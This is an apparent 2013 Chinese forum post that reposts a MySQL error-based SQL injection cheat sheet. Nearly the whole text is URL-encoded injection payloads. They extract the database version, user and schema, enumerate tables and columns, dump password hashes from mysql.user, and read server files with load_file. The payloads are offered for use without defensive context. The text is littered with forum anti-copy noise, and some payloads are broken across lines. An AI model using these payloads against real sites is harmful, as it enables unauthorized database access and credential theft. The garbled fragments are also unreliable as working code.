Mysql暴错注入参考（pdf）

admin

本帖最后由 Nightmare 于 2013-3-17 14:20 编辑
+ {' p% [! V% J) p

# K; m3 ^, R# \: w6 ^! E  SMysql暴错注入参考（pdf），每天一贴。。。
8 @+ r! G+ O5 ^2 ]# X
8 R" y  I8 U: w/ @MySql Error Based Injection Reference
[Mysql暴错注入参考]
: }7 K# g- L' c. }' I& T& ?1 bAuthornig0s1992
Blog:http://pnig0s1992.blog.51cto.com/
& r. b) C+ M: w& LTeAm:http://www.FreeBuf.com/
. ?4 S6 g" c( P7 ]# ^5 T" n, bMysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功
; `1 F& U+ d0 V+ `# ^1 @. u4 r小部分版本使用name_const()时会报错.可以用给出的Method.2测试
查询版本:
4 s' [/ H+ K9 r7 G' ^5 `) o+ cMethod.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+
& |! f- I+ s2 ~, e' }- tjoin+(select+name_const(@@version,0))b)c)
3 ~4 |( R% E+ @3 ?2 }$ s( S6 {Method.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro
up by a)b)
+ f$ o1 X- C: b9 q1 K+ Z$ M查询当前用户:
9 ~( T% U) O3 n( I6 Z& ~6 d+ ?$ UMethod.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
6 L* }0 \0 _. S% ~+ I! X, z4 q( xMethod.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r
/ T% W* W4 D: c  `6 \and(0)*2))x+from+information_schema.tables+group+by+x)a)
查询当前数据库:
0 O' j  ^* N% ^4 MMethod.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
Method.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
- y; _) Q; X2 {9 l3 [2 kor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+
LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
1 W4 ]9 S# h- Q0 z' P+ ]; A顺序替换
7 a2 N% f! P  h" ~爆指定库数目:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t
. U( D5 {2 f- M6 Z: S( Rable_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group
+by+x)a)+and+1=1 0x6D7973716C=mysql
+ e% r4 V: O" r7 m2 d6 m2 w依次爆表:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t
able_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta
bles+group+by+x)a)+and+1=1
0x6D7973716C=Mysql 将n顺序替换
2 i0 B, O) V; y) H% u% `爆表内字段数目:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran
1 F% L  }8 ^4 j1 c6 T% R8 p0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
依次爆字段:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where
* c( E) D; ]$ D3 G. _2 J! e+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1
loor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1  将n顺序替换
/ d" s1 n' \3 |8 j; l  E1 K5 Q# P依次暴内容:
and+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche
ma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
将n顺序替换
爆文件内容:
and+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a
from+information_schema.tables+group+by+a)b)
0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节
+ U- k: I: D' Y- hThx for reading.

不要下载也可以，
: ?# G0 W) I9 i+ O5 {4 O' U9 u' `